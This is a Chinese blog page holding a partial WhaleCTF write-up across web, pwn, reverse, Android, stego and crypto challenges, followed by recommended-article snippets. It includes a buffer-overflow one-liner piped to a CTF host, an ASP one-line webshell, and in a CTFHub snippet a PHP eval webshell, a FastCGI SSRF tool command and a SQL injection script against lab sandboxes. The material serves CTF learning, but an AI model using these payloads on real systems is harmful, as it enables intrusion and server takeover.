whalectf 部分writeup

最新推荐文章于 2025-10-23 14:58:46 发布
原创 最新推荐文章于 2025-10-23 14:58:46 发布 · 3.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#whalectf

本文解析了多项CTF挑战,包括Web安全、密码学、逆向工程及隐写术等内容,展示了如何利用各种技术和工具解决复杂的安全问题。

Web

Find me 右键查看源码flag:{This_is_s0_simpl3}

密码泄露
http://39.107.92.230/web/web5/password.txt发现密码字典
爆破发现长度不一样的密码:Nsf0cuS
源码中截断了5位,修改请求包,将密码改为Nsf0cuS,返回这里没有flag字样
发现cookies:newpage=MjkwYmNhNzBjN2RhZTkzZGI2NjQ0ZmEwMGI5ZdgzYjkucGhw
Base64解290bca70c7dae93db6644fa00b9d83b9.php
进入为留言板,然后这里写图片描述

本地登录 抓包 添加X-Forwarded-For: 127.0.0.1,isadmin改为1
flag:{Why_ar3_y0u_s0_dia0}

http这里写图片描述

Pwn1
脚本:cat <(python -c “print ‘\x11’*40+’\x34\x12\xcd\xab’”) - | nc bamboofox.cs.nctu.edu.tw 22001
这里写图片描述
参考:http://www.secist.com/archives/3619.html
https://blog.youkuaiyun.com/CJ_Kano/article/details/42404985
这里写图片描述

R100
Python脚本
这里写图片描述
Password为Code_Talkers,但是提交不对、

Re 逆向练习
OD调试KEY{e2s6ry3r5s8f6 共17位,
单步调试
再打开IDA发现后几位未1024}
Flag为KEY{e2s6ry3r5s8f61024}

后面的比较简单,没上传图,觉得麻烦,需要就看下,不需要就算了,还有很多难点的没做出来———有空继续
Re
1. PE格式
PETool打开
块数目 0x0004
时间戳 0x591D5CCC
入口地址 0x0005B789
便是 0x0103
组合下
BJWXB_CTF{0004h-591D5CCCh-0005B789h-0103h}
2.Re warmup100 简单的异或

调试后发现是异或

算出BJWXB_CTF{W4rm_UP_warm_up_WARM_UP!}

  1. Re100 app-release 拖入jeb 发现是byte异或
    print(enc(“PXEJPMQFTiS|v\"#vMDwKMA3_b~w3o”, 18))
    计算BJWXB_CTF{Andr01d_VerY_S!Mple!}

Android1:

Jeb打开发现,byte[]=aHR0cDovLzQ1LjMyLjQ3Ljk4
,base64解码得http://45.32.47.98,,flag为ip

Android05
enc(jeb打开一串字符串,15) #异或

android09

找到该方法,gevalue()反回值是20000,符合要求,所以只需修改判断处得标识,使执行,修改11,flag{11}

杂项
流量分析100

Tcp流追踪下载原始数据
得到 ,winhex打开doc发现key
key{23ac600a11eaffc8}
decode 3
JavaScript 代码转换,直接将其在控制台执行得flag=itisjavascriptenjoy%21
其中%21=!

Decode8
flag{Just_4_fun_0.0}
https://www.cnblogs.com/zqh20145320/p/5710072.html
ascii表得整体凯撒移动

Decode9
Flag{? enusCtf }
参见https://blog.youkuaiyun.com/lanvnal/article/details/54635612
控制台运行得到:┼攠數畣整爠煥敵瑳∨?湥獵瑃≦┩
把上面这串复制到记事本,另存为,编码选上“Unicode”,关闭。用WinHex等可以查看16进制的软件,直接打开,一目了然。如果想显示正常,把开头的FF FE两个字节删了,再用记事本打开就看到了。木马为 <% execute request(“? enusCtf”)%

隐写
Find 50
拖入stegSolve,发现二维码层,扫描即可得

被我吃了50
Binwalk一看,修改后缀为.zip,解压即可得flag.txt

 合体鲸鱼
Frame browser

亚种50
Winhex直接打开flag{firsttry}

下雨天50 上工具StegSolve,好几个都是直接这工具就出来了、、、

愤怒得小猪100
扫码

真是动态图100
修改头格式,将9a改为GIF89a,打开是动态图,stegsolve分层看是base64编码,
组合为
Y2F0Y2hfdGh1X2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
解压catch_thu_dynamic_flag_is_qumte_simple,提交不对
改下key{catch_the_dynamic_flag_is_quite_simple},Ok!

密码学
德军密码(二进制密码)
KEY{YAHKR} 小写输入不对,不知道为啥

密钥生成
上脚本
d= 125631357777427553
rsa破解
通过公钥解密
openssl rsa -pubin -text -modulus -in warmup -in public.pem
得到n= 0xA41006DEFD378B7395B4E2EB1EC9BF56A61CD9C3B5A0A73528521EEB2FB817A7、
E= 65537 (0x10001)

CTFer成长计划训练营第二期挑战赛
七堇年的博客
10-01 874
CTFer成长计划训练营第二期挑战赛 1. 签到题 解压后发现二维码,微信扫码 flag{China_happy_birthday} 2. 刑天的烦恼 发现文件受损,因此我们需要去修复文件:这对我们对于图片的文件结构要有了解。找到gif的文件格式,然后对照 这个破损的文件。Gif的图片格式文档可以查看这个链接:发现文件受损,因此我们需要去修复文件:这对我们对于图片的文件结构要有了解。找到gif的文件格式,用010 Editor打开后对照会发现头部缺少:GIF8,进行补充47494638 ps打开,发现P
WhaleCTF Web部分writeup
MozhuCY的博客
02-04 3890
Web部分writeup(真的是部分wp 二进制小白兼web盲来记录下今天做的几道题。。。 0x00 签到题直接f12查看源码即可 0x01 http呀 这里提供两种思路 做web肯定少不了burpsuit啦,网页中给了提示,Do you know what happend just now?! ( •̀∀•́ )突然想起南邮CTF平台上的两道题,考虑是不是flag在
2025 CTF Writeup 实战指南:从新手到大师的撰写方法论(附真题案例)
最新发布
2401_85688943的博客
10-23 1105
在CTF竞赛进入“精细化对抗”的今天,Writeup早已超越“解题步骤记录”的范畴,成为技术沉淀的载体、团队协作的桥梁,更是安全社区知识传承的核心媒介。2025年的CTF赛事呈现出跨模块融合(如Web+Crypto、Reverse+Misc)、实战场景落地(云环境漏洞、容器逃逸)、反制技术升级(多层混淆、动态WAF)三大特征,这对Writeup的撰写提出了全新要求:不仅要“说清怎么做”,更要“讲透为什么”,还要“还原试错过程”。自我复盘:通过结构化梳理暴露知识盲区,形成“解题-总结-提升”的闭环;
关于信息实验开放实验第一天的gif隐写题
weixin_43593174的博客
04-29 560
打开GIF文件发现文件已经损坏 用010 Editor打开文件 和GIF的格式对比,发现头文件缺失“GIF8” 用010 Editor来补全文件头,得到一个闪动的密码 由于速度太快,采用Nomad GIF来进行分析,可得每一帧画面 图像有所重叠,可以用NomaGIF中的编辑板来改变背景颜色 单击背景的字母 点击更改颜色 将其改为随机另一种颜色,结果为 对每一帧实行相同操作,并且读...
iscc 2014 writeup(图片处理题)
Ee1s
08-02 3149
广纳谏言
Protostar Format Write Up
无节操
11-22 1160
protostar format writeup
Writeup
Ater的博客
11-19 719
十一月份上旬总结 在做这道题目之前下载了虚拟机安装好了Ubuntu 然后弄好共享文件夹(经过百度我在Ubuntu中找到了我创建的share共享文件夹) 然后将此题的附件下载到share文件夹,并且改好名字,因为名字太长不方便使用,我改成了linux 分析题目,需要在linux里面找到关于flag的东西 打开终端,输入以下代码进入root身份(经过百度已经创建好了root身份) su root ...
whaleCTF MISC_Writeup(姿势大全)
Pad0y的博客
04-21 2709
这两天抽空把whaleCTF的MISC部分的题目整理了下,比较基础,writeup写得简陋了些,如有错误欢迎各位师傅指正,持续更新 Find 直接上stegsolve神器,会发现一张反色的二维码,保存下来再反色即可,得到flag flag{hctf_3xF$235#\x5e3} 被我吃了 winhex下可以看到图片包含了一个zip,分离至新文件保存为zip即可得到flag flag{Welcome...
whaleCTF RE方向部分writeup
苗_的博客
01-02 563
0x00 PE格式 用PEtools打开,通过查找 块数目 0x0004 时间戳 0x591D5CCC 入口地址 0x0005B789 信息标识 0x0103 得出flag:BJWXB_CTF{0004h-591D5CCCh-0005B789h-0103h} 0x01 WarmUp 经过一系列操作,进入compare函数,然后进入分支语句。 回头看,若v17和上图中高亮部分相等,则...
精选资源
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup
05-27
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup解析部分题目
WriteUp模板1
08-08
WriteUp模板1
whaleCTF 杂项_Writeup
Pad0y的博客
04-21 3102
Decode1 整道题的一个思路是 hex–&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;ascii–&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;url–&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;base64–&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;ascii–&amp;amp;amp;amp;amp;amp;amp;a
pdf的writeup
MarcusRYZ的博客
02-07 590
    大家好,又见面了。这次我要分享的是关于攻防世界MISC部分pdf的writeup。下面我们看题目:     题目描述其实已经比较清楚了:菜猫给了菜狗一张图,说图下面什么都没有。我们下载附件,打开后是一张格式为PDF的图片。     这张图片看不出什么花样。根据题意,这有点此地无银三百两的感觉,flag很可能藏在图片下面。但是我们无法直接编辑格式为PDF的图片,于是我想到了先将其转格式为W...
攻防世界Web练习区Writeup
weixin_42831646的博客
11-07 3563
一些工具 burpsuite SwitchyOmega:Chrome用的代理插件 view_source flag: cyberpeace{c0bffec917b3e51ebf26546ac2c88e79} Writeup 这个题打开之后右键没有反应,直接F12 robots flag: cyberpeace{829baa53f19972442c21944e8205697f} 首先介绍一下Robots是做什么的 Robots简介 1 什么是robots协议? robots协议也叫robots.txt(统一
第一次写writeup
weixin_43896279的博客
07-04 3839
My WriteUp 题目:http://ctf5.shiyanbar.com/DUTCTF/1.html (第一次写writeup。。。嗯都懂) 思路:点进去发现真的是what a fuck! 感觉是一堆乱码 后来仔细看了看发现里面主要出现【】()+!符号,然后百度了一下,这叫jsfuck编码然后一大堆看了一下,没看懂,只明白一个大体意思就是可以对代码加密和防注入然后百度了一下解密 找了...
Bugku CTF 加密writeup (未完待续)
KRDecad3的博客
05-18 3597
Bugku CTF 加密writeup (未完待续) 本人CTF小白一枚,此wp是参考网上大佬的wp再加上自己操作写出来的,如有纰漏,还请指正。 0x01滴答~滴 从提供的密码可以猜测是摩尔斯密码,利用bugku自带的解码工具进行解码, space为空格,short为“.”,long为“-”,得到flag。 0x02聪明的小羊 提示中有“栅栏”,则猜测为栅栏密码,并且栏数为2,...
CTFer训练营第二期(国庆)挑战赛 WP
小元砸的博客
10-01 827
1. 签到 直接扫码得结果 2. 刑天的烦恼 补上文件头 逐帧分析网址:https://tu.sioe.cn/gj/fenjie/ 可得到Y2F0Y2hfdGhlX2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU= Base64解密得catch_the_dynamic_flag_is_qumte_simple 3. Boom 第一步: 解出得 第二步 解出得:x=74 y=68 z=31 第三步 解出得:x1=89127561 x2=-89127561 大胆的猜测是f
ISCC2014--basic+web+misc
w4y2'blog
06-15 4043
之前也没做过这一部分的题,但觉得这些题挺有意思的,比赛时间又长,就边学边做,也学到不少东西。   Basic 兵者诡道 进入关卡后 一番胡乱猜测后就没着了,大牛提示用GET,但是web小白没玩过抓包啊,学习一番,用WinsockExpert 得到了Key:Welcome-to-ISCC     知己知彼 只有两种字符,首先就猜测是摩尔密码,翻译为7个字符“m
writeup
09-26
以下是部分 CTFHub web 基础教程的 writeup: - **信息泄漏**: ```bash # 安装 dirsearch 包 sudo apt-get install dirsearch # 目录扫描,-u 用于指定要扫描的 URL sudo dirsearch -u "http://challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/" # 进入相关目录 ls cd site ls cd challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/ ls # 扫描程序获取当前 Git 仓库的提交历史信息 git log # 在 Git 中配置一个名为 safe.directory 的全局设置,指定安全目录 git config --global --add safe.directory /home/kali/Desktop/GitHack/site/challenge-74ace4f302db1181.sandbox.ctfhub.com:10800 ls git log ``` - **SSRF 通关攻略之 FastCGI 协议**: ```bash # 在 kali 里下载 gopherus 工具并解压 git clone https://github.com/tarunkant/Gopherus.git # 在文件里打开终端,执行命令 python2 gopherus.py --exploit fastcgi ``` 判断文件是否存在,通过访问不同文件观察返回信息: ```bash # 尝试访问首页文件 访问首页文件 index.php # 访问不存在的文件 输入 wjf.php 显示 404,说明 index.php 存在 ``` 注入木马及编码操作: ```bash # 一句话木马 <?php @eval($_POST[&#39;cmd&#39;]);?> # base64 编码 PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= # 解码并保存为 shell.php echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > shell.php ``` 连接木马: ```bash # 打开蚁剑,右键添加数据,添加木马文件 http://challenge-641b288f17028a60.sandbox.ctfhub.com:10800/wjf123.php ``` - **SQL 注入**: ```python import requests def mySQL(payload): url = &#39;http://challenge-196392c6b0acebd8.sandbox.ctfhub.com:10800/&#39; header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "Cookie": "id=-1 " + payload + "; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F", } r = requests.get(url, headers=header) return r.text print(mySQL("union select 1,group_concat(schema_name)from information_schema.schemata")) print(mySQL("union select 1,group_concat(table_name) from information_schema.tables where table_schema=&#39;sqli&#39;")) print(mySQL("union select 1,group_concat(column_name) from information_schema.columns where table_schema=&#39;sqli&#39; and table_name=&#39;srdnlrlphq&#39;")) print(mySQL("union select 1,group_concat(icehhmfjxt) from sqli.srdnlrlphq")) ``` - **XSS**:分析完后利用前面的 XSS 网站生成 XSS 攻击代码。注册完进入页面,点击“我的项目”后面的“创建”,选择默认配置,拉到最下面点击“下一步”,将生成的代码拼接到原题目网址后面的 `?name=` 后面,再输入到第二个框内,点击“send”。成功后回到 XSS 网站点击项目内容查看记录[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值